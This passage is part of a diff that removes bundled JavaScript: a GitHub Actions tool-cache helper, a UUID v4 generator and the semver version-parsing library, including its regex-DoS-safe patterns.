defaults to arch of computer - */ -function findAllVersions(toolName, arch) { - const versions = []; - arch = arch || os.arch(); - const toolPath = path.join(_getCacheDirectory(), toolName); - if (fs.existsSync(toolPath)) { - const children = fs.readdirSync(toolPath); - for (const child of children) { - if (isExplicitVersion(child)) { - const fullPath = path.join(toolPath, child, arch || ''); - if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { - versions.push(child); - } - } - } - } - return versions; -} -exports.findAllVersions = findAllVersions; -function getManifestFromRepo(owner, repo, auth, branch = 'master') { - return __awaiter(this, void 0, void 0, function* () { - let releases = []; - const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; - const http = new httpm.HttpClient('tool-cache'); - const headers = {}; - if (auth) { - core.debug('set auth'); - headers.authorization = auth; - } - const response = yield http.getJson(treeUrl, headers); - if (!response.result) { - return releases; - } - let manifestUrl = ''; - for (const item of response.result.tree) { - if (item.path === 'versions-manifest.json') { - manifestUrl = item.url; - break; - } - } - headers['accept'] = 'application/vnd.github.VERSION.raw'; - let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); - if (versionsRaw) { - // shouldn't be needed but protects against invalid json saved with BOM - versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); - try { - releases = JSON.parse(versionsRaw); - } - catch (_a) { - core.debug('Invalid json'); - } - } - return releases; - }); -} -exports.getManifestFromRepo = getManifestFromRepo; -function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { - return __awaiter(this, void 0, void 0, function* () { - // wrap the internal impl - const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); - return match; - }); -} -exports.findFromManifest = 
findFromManifest; -function _createExtractFolder(dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!dest) { - // create a temp dir - dest = path.join(_getTempDirectory(), v4_1.default()); - } - yield io.mkdirP(dest); - return dest; - }); -} -function _createToolPath(tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - core.debug(`destination ${folderPath}`); - const markerPath = `${folderPath}.complete`; - yield io.rmRF(folderPath); - yield io.rmRF(markerPath); - yield io.mkdirP(folderPath); - return folderPath; - }); -} -function _completeToolPath(tool, version, arch) { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - const markerPath = `${folderPath}.complete`; - fs.writeFileSync(markerPath, ''); - core.debug('finished caching tool'); -} -/** - * Check if version string is explicit - * - * @param versionSpec version string to check - */ -function isExplicitVersion(versionSpec) { - const c = semver.clean(versionSpec) || ''; - core.debug(`isExplicit: ${c}`); - const valid = semver.valid(c) != null; - core.debug(`explicit? 
${valid}`); - return valid; -} -exports.isExplicitVersion = isExplicitVersion; -/** - * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` - * - * @param versions array of versions to evaluate - * @param versionSpec semantic version spec to satisfy - */ -function evaluateVersions(versions, versionSpec) { - let version = ''; - core.debug(`evaluating ${versions.length} versions`); - versions = versions.sort((a, b) => { - if (semver.gt(a, b)) { - return 1; - } - return -1; - }); - for (let i = versions.length - 1; i >= 0; i--) { - const potential = versions[i]; - const satisfied = semver.satisfies(potential, versionSpec); - if (satisfied) { - version = potential; - break; - } - } - if (version) { - core.debug(`matched: ${version}`); - } - else { - core.debug('match not found'); - } - return version; -} -exports.evaluateVersions = evaluateVersions; -/** - * Gets RUNNER_TOOL_CACHE - */ -function _getCacheDirectory() { - const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; - assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); - return cacheDirectory; -} -/** - * Gets RUNNER_TEMP - */ -function _getTempDirectory() { - const tempDirectory = process.env['RUNNER_TEMP'] || ''; - assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); - return tempDirectory; -} -/** - * Gets a global variable - */ -function _getGlobal(key, defaultValue) { - /* eslint-disable @typescript-eslint/no-explicit-any */ - const value = global[key]; - /* eslint-enable @typescript-eslint/no-explicit-any */ - return value !== undefined ? value : defaultValue; -} -/** - * Returns an array of unique values. - * @param values Values to make unique. 
- */ -function _unique(values) { - return Array.from(new Set(values)); -} -//# sourceMappingURL=tool-cache.js.map - -/***/ }), - -/***/ 7701: -/***/ ((module) => { - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -var byteToHex = []; -for (var i = 0; i < 256; ++i) { - byteToHex[i] = (i + 0x100).toString(16).substr(1); -} - -function bytesToUuid(buf, offset) { - var i = offset || 0; - var bth = byteToHex; - // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 - return ([ - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]] - ]).join(''); -} - -module.exports = bytesToUuid; - - -/***/ }), - -/***/ 7269: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -// Unique ID creation requires a high quality random # generator. In node.js -// this is pretty straight-forward - we use the crypto API. - -var crypto = __nccwpck_require__(6113); - -module.exports = function nodeRNG() { - return crypto.randomBytes(16); -}; - - -/***/ }), - -/***/ 7468: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -var rng = __nccwpck_require__(7269); -var bytesToUuid = __nccwpck_require__(7701); - -function v4(options, buf, offset) { - var i = buf && offset || 0; - - if (typeof(options) == 'string') { - buf = options === 'binary' ? 
new Array(16) : null; - options = null; - } - options = options || {}; - - var rnds = options.random || (options.rng || rng)(); - - // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - rnds[6] = (rnds[6] & 0x0f) | 0x40; - rnds[8] = (rnds[8] & 0x3f) | 0x80; - - // Copy bytes to buffer, if provided - if (buf) { - for (var ii = 0; ii < 16; ++ii) { - buf[i + ii] = rnds[ii]; - } - } - - return buf || bytesToUuid(rnds); -} - -module.exports = v4; - - -/***/ }), - -/***/ 5911: -/***/ ((module, exports) => { - -exports = module.exports = SemVer - -var debug -/* istanbul ignore next */ -if (typeof process === 'object' && - process.env && - process.env.NODE_DEBUG && - /\bsemver\b/i.test(process.env.NODE_DEBUG)) { - debug = function () { - var args = Array.prototype.slice.call(arguments, 0) - args.unshift('SEMVER') - console.log.apply(console, args) - } -} else { - debug = function () {} -} - -// Note: this is the semver.org version of the spec that it implements -// Not necessarily the package version of this code. -exports.SEMVER_SPEC_VERSION = '2.0.0' - -var MAX_LENGTH = 256 -var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || - /* istanbul ignore next */ 9007199254740991 - -// Max safe segment length for coercion. -var MAX_SAFE_COMPONENT_LENGTH = 16 - -var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 - -// The actual regexps go on exports.re -var re = exports.re = [] -var safeRe = exports.safeRe = [] -var src = exports.src = [] -var t = exports.tokens = {} -var R = 0 - -function tok (n) { - t[n] = R++ -} - -var LETTERDASHNUMBER = '[a-zA-Z0-9-]' - -// Replace some greedy regex tokens to prevent regex dos issues. These regex are -// used internally via the safeRe object since all inputs in this library get -// normalized first to trim and collapse all extra whitespace. The original -// regexes are exported for userland consumption and lower level usage. 
A -// future breaking change could export the safer regex only with a note that -// all input should have extra whitespace removed. -var safeRegexReplacements = [ - ['\\s', 1], - ['\\d', MAX_LENGTH], - [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], -] - -function makeSafeRe (value) { - for (var i = 0; i < safeRegexReplacements.length; i++) { - var token = safeRegexReplacements[i][0] - var max = safeRegexReplacements[i][1] - value = value - .split(token + '*').join(token + '{0,' + max + '}') - .split(token + '+').join(token + '{1,' + max + '}') - } - return value -} - -// The following Regular Expressions can be used for tokenizing, -// validating, and parsing SemVer version strings. - -// ## Numeric Identifier -// A single `0`, or a non-zero digit followed by zero or more digits. - -tok('NUMERICIDENTIFIER') -src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' -tok('NUMERICIDENTIFIERLOOSE') -src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' - -// ## Non-numeric Identifier -// Zero or more digits, followed by a letter or hyphen, and then zero or -// more letters, digits, or hyphens. - -tok('NONNUMERICIDENTIFIER') -src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' - -// ## Main Version -// Three dot-separated numeric identifiers. - -tok('MAINVERSION') -src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')' - -tok('MAINVERSIONLOOSE') -src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' - -// ## Pre-release Version Identifier -// A numeric identifier, or a non-numeric identifier. 
- -tok('PRERELEASEIDENTIFIER') -src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -tok('PRERELEASEIDENTIFIERLOOSE') -src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -// ## Pre-release Version -// Hyphen, followed by one or more dot-separated pre-release version -// identifiers. - -tok('PRERELEASE') -src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' - -tok('PRERELEASELOOSE') -src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' - -// ## Build Metadata Identifier -// Any combination of digits, letters, or hyphens. - -tok('BUILDIDENTIFIER') -src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' - -// ## Build Metadata -// Plus sign, followed by one or more period-separated build metadata -// identifiers. - -tok('BUILD') -src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + - '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' - -// ## Full Version String -// A main version, followed optionally by a pre-release version and -// build metadata. - -// Note that the only major, minor, patch, and pre-release sections of -// the version string are capturing groups. The build metadata is not a -// capturing group, because it should not ever be used in version -// comparison. - -tok('FULL') -tok('FULLPLAIN') -src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + - src[t.PRERELEASE] + '?' + - src[t.BUILD] + '?' - -src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' - -// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. -// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty -// common in the npm registry. -tok('LOOSEPLAIN') -src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + - src[t.PRERELEASELOOSE] + '?' + - src[t.BUILD] + '?' 
- -tok('LOOSE') -src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' - -tok('GTLT') -src[t.GTLT] = '((?:<|>)?=?)' - -// Something like "2.*" or "1.2.x". -// Note that "x.x" is a valid xRange identifer, meaning "any version" -// Only the first item is strictly required. -tok('XRANGEIDENTIFIERLOOSE') -src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' -tok('XRANGEIDENTIFIER') -src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' - -tok('XRANGEPLAIN') -src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:' + src[t.PRERELEASE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGEPLAINLOOSE') -src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:' + src[t.PRERELEASELOOSE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGE') -src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' -tok('XRANGELOOSE') -src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' - -// Coercion. -// Extract anything that could conceivably be a part of a valid semver -tok('COERCE') -src[t.COERCE] = '(^|[^\\d])' + - '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:$|[^\\d])' -tok('COERCERTL') -re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') -safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') - -// Tilde ranges. 
-// Meaning is "reasonably at or greater than" -tok('LONETILDE') -src[t.LONETILDE] = '(?:~>?)' - -tok('TILDETRIM') -src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' -re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') -safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') -var tildeTrimReplace = '$1~' - -tok('TILDE') -src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' -tok('TILDELOOSE') -src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' - -// Caret ranges. -// Meaning is "at least and backwards compatible with" -tok('LONECARET') -src[t.LONECARET] = '(?:\\^)' - -tok('CARETTRIM') -src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' -re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') -safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') -var caretTrimReplace = '$1^' - -tok('CARET') -src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' -tok('CARETLOOSE') -src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' - -// A simple gt/lt/eq thing, or just "" to indicate "any version" -tok('COMPARATORLOOSE') -src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' -tok('COMPARATOR') -src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' - -// An expression to strip any whitespace between the gtlt and the thing -// it modifies, so that `> 1.2.3` ==> `>1.2.3` -tok('COMPARATORTRIM') -src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + - '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' - -// this one has to use the /g flag -re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') -safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') -var comparatorTrimReplace = '$1$2$3' - -// Something like `1.2.3 - 1.2.4` -// Note that these all use the loose form, because they'll be -// checked against either the strict or loose comparator form -// later. 
-tok('HYPHENRANGE') -src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAIN] + ')' + - '\\s*$' - -tok('HYPHENRANGELOOSE') -src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s*$' - -// Star ranges basically just allow anything at all. -tok('STAR') -src[t.STAR] = '(<|>)?=?\\s*\\*' - -// Compile to actual regexp objects. -// All are flag-free, unless they were created above with a flag. -for (var i = 0; i < R; i++) { - debug(i, src[i]) - if (!re[i]) { - re[i] = new RegExp(src[i]) - - // Replace all greedy whitespace to prevent regex dos issues. These regex are - // used internally via the safeRe object since all inputs in this library get - // normalized first to trim and collapse all extra whitespace. The original - // regexes are exported for userland consumption and lower level usage. A - // future breaking change could export the safer regex only with a note that - // all input should have extra whitespace removed. - safeRe[i] = new RegExp(makeSafeRe(src[i])) - } -} - -exports.parse = parse -function parse (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (version instanceof SemVer) { - return version - } - - if (typeof version !== 'string') { - return null - } - - if (version.length > MAX_LENGTH) { - return null - } - - var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] - if (!r.test(version)) { - return null - } - - try { - return new SemVer(version, options) - } catch (er) { - return null - } -} - -exports.valid = valid -function valid (version, options) { - var v = parse(version, options) - return v ? v.version : null -} - -exports.clean = clean -function clean (version, options) { - var s = parse(version.trim().replace(/^[=v]+/, ''), options) - return s ? 
s.version : null -} - -exports.SemVer = SemVer - -function SemVer (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - if (version instanceof SemVer) { - if (version.loose === options.loose) { - return version - } else { - version = version.version - } - } else if (typeof version !== 'string') { - throw new TypeError('Invalid Version: ' + version) - } - - if (version.length > MAX_LENGTH) { - throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') - } - - if (!(this instanceof SemVer)) { - return new SemVer(version, options) - } - - debug('SemVer', version, options) - this.options = options - this.loose = !!options.loose - - var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) - - if (!m) { - throw new TypeError('Invalid Version: ' + version) - } - - this.raw = version - - // these are actually numbers - this.major = +m[1] - this.minor = +m[2] - this.patch = +m[3] - - if (this.major > MAX_SAFE_INTEGER || this.major < 0) { - throw new TypeError('Invalid major version') - } - - if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { - throw new TypeError('Invalid minor version') - } - - if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { - throw new TypeError('Invalid patch version') - } - - // numberify any prerelease numeric ids - if (!m[4]) { - this.prerelease = [] - } else { - this.prerelease = m[4].split('.').map(function (id) { - if (/^[0-9]+$/.test(id)) { - var num = +id - if (num >= 0 && num < MAX_SAFE_INTEGER) { - return num - } - } - return id - }) - } - - this.build = m[5] ? m[5].split('.') : [] - this.format() -} - -SemVer.prototype.format = function () { - this.version = this.major + '.' + this.minor + '.' 
+ this.patch - if (this.prerelease.length) { - this.version += '-' + this.prerelease.join('.') - } - return this.version -} - -SemVer.prototype.toString = function () { - return this.version -} - -SemVer.prototype.compare = function (other) { - debug('SemVer.compare', this.version, this.options, other) - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return this.compareMain(other) || this.comparePre(other) -} - -SemVer.prototype.compareMain = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return compareIdentifiers(this.major, other.major) || - compareIdentifiers(this.minor, other.minor) || - compareIdentifiers(this.patch, other.patch) -} - -SemVer.prototype.comparePre = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - // NOT having a prerelease is > having one - if (this.prerelease.length && !other.prerelease.length) { - return -1 - } else if (!this.prerelease.length && other.prerelease.length) { - return 1 - } else if (!this.prerelease.length && !other.prerelease.length) { - return 0 - } - - var i = 0 - do { - var a = this.prerelease[i] - var b = other.prerelease[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while (++i) -} - -SemVer.prototype.compareBuild = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - var i = 0 - do { - var a = this.build[i] - var b = other.build[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while 
(++i) -} - -// preminor will bump the version up to the next minor release, and immediately -// down to pre-release. premajor and prepatch work the same way. -SemVer.prototype.inc = function (release, identifier) { - switch (release) { - case 'premajor': - this.prerelease.length = 0 - this.patch = 0 - this.minor = 0 - this.major++ - this.inc('pre', identifier) - break - case 'preminor': - this.prerelease.length = 0 - this.patch = 0 - this.minor++ - this.inc('pre', identifier) - break - case 'prepatch': - // If this is already a prerelease, it will bump to the next version - // drop any prereleases that might already exist, since they are not - // relevant at this point. - this.prerelease.length = 0 - this.inc('patch', identifier) - this.inc('pre', identifier) - break - // If the input is a non-prerelease version, this acts the same as - // prepatch. - case 'prerelease': - if (this.prerelease.length === 0) { - this.inc('patch', identifier) - } - this.inc('pre', identifier) - break - - case 'major': - // If this is a pre-major version, bump up to the same major version. - // Otherwise increment major. - // 1.0.0-5 bumps to 1.0.0 - // 1.1.0 bumps to 2.0.0 - if (this.minor !== 0 || - this.patch !== 0 || - this.prerelease.length === 0) { - this.major++ - } - this.minor = 0 - this.patch = 0 - this.prerelease = [] - break - case 'minor': - // If this is a pre-minor version, bump up to the same minor version. - // Otherwise increment minor. - // 1.2.0-5 bumps to 1.2.0 - // 1.2.1 bumps to 1.3.0 - if (this.patch !== 0 || this.prerelease.length === 0) { - this.minor++ - } - this.patch = 0 - this.prerelease = [] - break - case 'patch': - // If this is not a pre-release version, it will increment the patch. - // If it is a pre-release it will bump up to the same patch version. - // 1.2.0-5 patches to 1.2.0 - // 1.2.0 patches to 1.2.1 - if (this.prerelease.length === 0) { - this.patch++ - } - this.prerelease = [] - break - // This probably shouldn't be used publicly. 
- // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. - case 'pre': - if (this.prerelease.length === 0) { - this.prerelease = [0] - } else { - var i = this.prerelease.length - while (--i >= 0) { - if (typeof this.prerelease[i] === 'number') { - this.prerelease[i]++ - i = -2 - } - } - if (i === -1) { - // didn't increment anything - this.prerelease.push(0) - } - } - if (identifier) { - // 1.2.0-beta.1 bumps to 1.2.0-beta.2, - // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 - if (this.prerelease[0] === identifier) { - if (isNaN(this.prerelease[1])) { - this.prerelease = [identifier, 0] - } - } else { - this.prerelease = [identifier, 0] - } - } - break - - default: - throw new Error('invalid increment argument: ' + release) - } - this.format() - this.raw = this.version - return this -} - -exports.inc = inc -function inc (version, release, loose, identifier) { - if (typeof (loose) === 'string') { - identifier = loose - loose = undefined - } - - try { - return new SemVer(version, loose).inc(release, identifier).version - } catch (er) { - return null - } -} - -exports.diff = diff -function diff (version1, version2) { - if (eq(version1, version2)) { - return null - } else { - var v1 = parse(version1) - var v2 = parse(version2) - var prefix = '' - if (v1.prerelease.length || v2.prerelease.length) { - prefix = 'pre' - var defaultResult = 'prerelease' - } - for (var key in v1) { - if (key === 'major' || key === 'minor' || key === 'patch') { - if (v1[key] !== v2[key]) { - return prefix + key - } - } - } - return defaultResult // may be undefined - } -} - -exports.compareIdentifiers = compareIdentifiers - -var numeric = /^[0-9]+$/ -function compareIdentifiers (a, b) { - var anum = numeric.test(a) - var bnum = numeric.test(b) - - if (anum && bnum) { - a = +a - b = +b - } - - return a === b ? 0 - : (anum && !bnum) ? -1 - : (bnum && !anum) ? 1 - : a < b ? 
-1 - : 1 -} - -exports.rcompareIdentifiers = rcompareIdentifiers -function rcompareIdentifiers (a, b) { - return compareIdentifiers(b, a) -} - -exports.major = major -function major (a, loose) { - return new SemVer(a, loose).major -} - -exports.minor = minor -function minor (a, loose) { - return new SemVer(a, loose).minor -} - -exports.patch = patch -function patch (a, loose) { - return new SemVer(a, loose).patch -} - -exports.compare = compare -function compare (a, b, loose) { - return new SemVer(a, loose).compare(new SemVer(b, loose)) -} - -exports.compareLoose = compareLoose -function compareLoose (a, b) { - return compare(a, b, true) -} - -exports.compareBuild = compareBuild -function compareBuild (a, b, loose) { - var versionA = new SemVer(a, loose) - var versionB = new SemVer(b, loose) - return versionA.compare(versionB) || versionA.compareBuild(versionB) -} - -exports.rcompare = rcompare -function rcompare (a, b, loose) { - return compare(b, a, loose) -} - -exports.sort = sort -function sort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(a, b, loose) - }) -} - -exports.rsort = rsort -function rsort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(b, a, loose) - }) -} - -exports.gt = gt -function gt (a, b, loose) { - return compare(a, b, loose) > 0 -} - -exports.lt = lt -function lt (a, b, loose) { - return compare(a, b, loose) < 0 -} - -exports.eq = eq -function eq (a, b, loose) { - return compare(a, b, loose) === 0 -} - -exports.neq = neq -function neq (a, b, loose) { - return compare(a, b, loose) !== 0 -} - -exports.gte = gte -function gte (a, b, loose) { - return compare(a, b, loose) >= 0 -} - -exports.lte = lte -function lte (a, b, loose) { - return compare(a, b, loose) <= 0 -} - -exports.cmp = cmp -function cmp (a, op, b, loose) { - switch (op) { - case '===': - if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a === b - - case '!==': - 
if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a !== b - - case '': - case '=': - case '==': - return eq(a, b, loose) - - case '!=': - return neq(a, b, loose) - - case '>': - return gt(a, b, loose) - - case '>=': - return gte(a, b, loose) - - case '<': - return lt(a, b, loose) - - case '<=': - return lte(a, b, loose) - - default: - throw new TypeError('Invalid operator: ' + op) - } -} - -exports.Comparator = Comparator -function Comparator (comp, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (comp instanceof Comparator) { - if (comp.loose === !!options.loose) { - return comp - } else { - comp = comp.value - } - } - - if (!(this instanceof Comparator)) { - return new Comparator(comp, options) - } - - comp = comp.trim().split(/\s+/).join(' ') - debug('comparator', comp, options) - this.options = options - this.loose = !!options.loose - this.parse(comp) - - if (this.semver === ANY) { - this.value = '' - } else { - this.value = this.operator + this.semver.version - } - - debug('comp', this) -} - -var ANY = {} -Comparator.prototype.parse = function (comp) { - var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var m = comp.match(r) - - if (!m) { - throw new TypeError('Invalid comparator: ' + comp) - } - - this.operator = m[1] !== undefined ? m[1] : '' - if (this.operator === '=') { - this.operator = '' - } - - // if it literally is just '>' or '' then allow anything. 
- if (!m[2]) { - this.semver = ANY - } else { - this.semver = new SemVer(m[2], this.options.loose) - } -} - -Comparator.prototype.toString = function () { - return this.value -} - -Comparator.prototype.test = function (version) { - debug('Comparator.test', version, this.options.loose) - - if (this.semver === ANY || version === ANY) { - return true - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - return cmp(version, this.operator, this.semver, this.options) -} - -Comparator.prototype.intersects = function (comp, options) { - if (!(comp instanceof Comparator)) { - throw new TypeError('a Comparator is required') - } - - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - var rangeTmp - - if (this.operator === '') { - if (this.value === '') { - return true - } - rangeTmp = new Range(comp.value, options) - return satisfies(this.value, rangeTmp, options) - } else if (comp.operator === '') { - if (comp.value === '') { - return true - } - rangeTmp = new Range(this.value, options) - return satisfies(comp.semver, rangeTmp, options) - } - - var sameDirectionIncreasing = - (this.operator === '>=' || this.operator === '>') && - (comp.operator === '>=' || comp.operator === '>') - var sameDirectionDecreasing = - (this.operator === '<=' || this.operator === '<') && - (comp.operator === '<=' || comp.operator === '<') - var sameSemVer = this.semver.version === comp.semver.version - var differentDirectionsInclusive = - (this.operator === '>=' || this.operator === '<=') && - (comp.operator === '>=' || comp.operator === '<=') - var oppositeDirectionsLessThan = - cmp(this.semver, '<', comp.semver, options) && - ((this.operator === '>=' || this.operator === '>') && - (comp.operator === '<=' || comp.operator === '<')) - var oppositeDirectionsGreaterThan = - cmp(this.semver, '>', comp.semver, options) && - ((this.operator === '<=' 
|| this.operator === '<') && - (comp.operator === '>=' || comp.operator === '>')) - - return sameDirectionIncreasing || sameDirectionDecreasing || - (sameSemVer && differentDirectionsInclusive) || - oppositeDirectionsLessThan || oppositeDirectionsGreaterThan -} - -exports.Range = Range -function Range (range, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (range instanceof Range) { - if (range.loose === !!options.loose && - range.includePrerelease === !!options.includePrerelease) { - return range - } else { - return new Range(range.raw, options) - } - } - - if (range instanceof Comparator) { - return new Range(range.value, options) - } - - if (!(this instanceof Range)) { - return new Range(range, options) - } - - this.options = options - this.loose = !!options.loose - this.includePrerelease = !!options.includePrerelease - - // First reduce all whitespace as much as possible so we do not have to rely - // on potentially slow regexes like \s*. This is then stored and used for - // future error messages as well. - this.raw = range - .trim() - .split(/\s+/) - .join(' ') - - // First, split based on boolean or || - this.set = this.raw.split('||').map(function (range) { - return this.parseRange(range.trim()) - }, this).filter(function (c) { - // throw out any that are not relevant for whatever reason - return c.length - }) - - if (!this.set.length) { - throw new TypeError('Invalid SemVer Range: ' + this.raw) - } - - this.format() -} - -Range.prototype.format = function () { - this.range = this.set.map(function (comps) { - return 